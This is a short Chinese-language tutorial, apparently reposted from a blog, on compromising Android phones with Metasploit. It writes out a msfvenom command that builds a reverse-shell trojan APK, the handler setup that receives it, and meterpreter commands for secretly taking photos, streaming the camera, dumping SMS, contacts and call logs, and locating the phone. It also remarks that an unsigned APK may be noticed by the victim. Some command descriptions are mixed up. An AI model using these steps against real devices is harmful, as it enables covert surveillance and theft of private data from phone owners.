Metasploit之滲透安卓實戰




Metasploit之滲透安卓實戰

在之前的Metaspoloit使用中都是在Windows系統中,因為滲透的是Windows系統,所以選用了“windows/meterpreter/reverse_tcp”模塊。
而這里需要滲透安卓系統了,就選用“android/meterpreter/reverse_tcp”模塊。
那么對於kali-linux連接木馬的方式還是和之前的一樣,利用“exploit/multi/handler”
並且,同樣需要選用“windows/meterpreter/reverse_tcp”的PAYLOAD
這里假設我的測試環境
kali-linux: 192.168.2.146
安卓模擬環境:192.168.2.107

 

一、生成遠程安卓木馬
msfconsole
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 R > payload.apk

命令解析:
p 設置要使用的payload
LHOST 設置用來接收反彈連接的主機(kali-linux的IP)
LPORT 設置用來接收反彈連接的端口(kali-linux的端口)
R 設置文件格式
Location 要保存的文件位置-->/root/Desktop/是桌面,沒有目錄表示當前系統Home目錄下
PS:對於目前的安卓系統安全機制的考慮,因為沒有簽名證書可能導致無法安裝或易被受害者識破
那么,簽名證書的制作可以查看參考文獻資料

 

二、開啟metasploit,並且開啟相關連接
msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.2.146
set LPORT 4444
exploit

 

三、meterpreter連接
安卓手機安裝並且打開木馬后會返回我們一個meterpreter連接,那么我們可以使用以下的一些常用的命令:

cd -->目錄切換,命令:cd / 切換到根目錄
search -->搜索文件,命令:search text.jpg
download -->下載文件,命令:download test.jpg
webcam_list -->查看攝像頭列表,因為手機都是前置和后置攝像頭了
webcam_snap -->拍照一張,需要選用前置或者后置攝像頭,命令:webcam_snap -i 1
webcam_stream -->開啟攝像頭視頻監控,同上,命令:webcam_stream -i 1
安卓系統相關命令:
check_root -->查看當前安卓是否已經root
dump_calllog -->下載通話記錄
dump_contacts -->下載短信記錄
dump_sms -->下載通訊錄
geolocate -->利用谷歌地圖定位(需要安裝谷歌地圖)

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM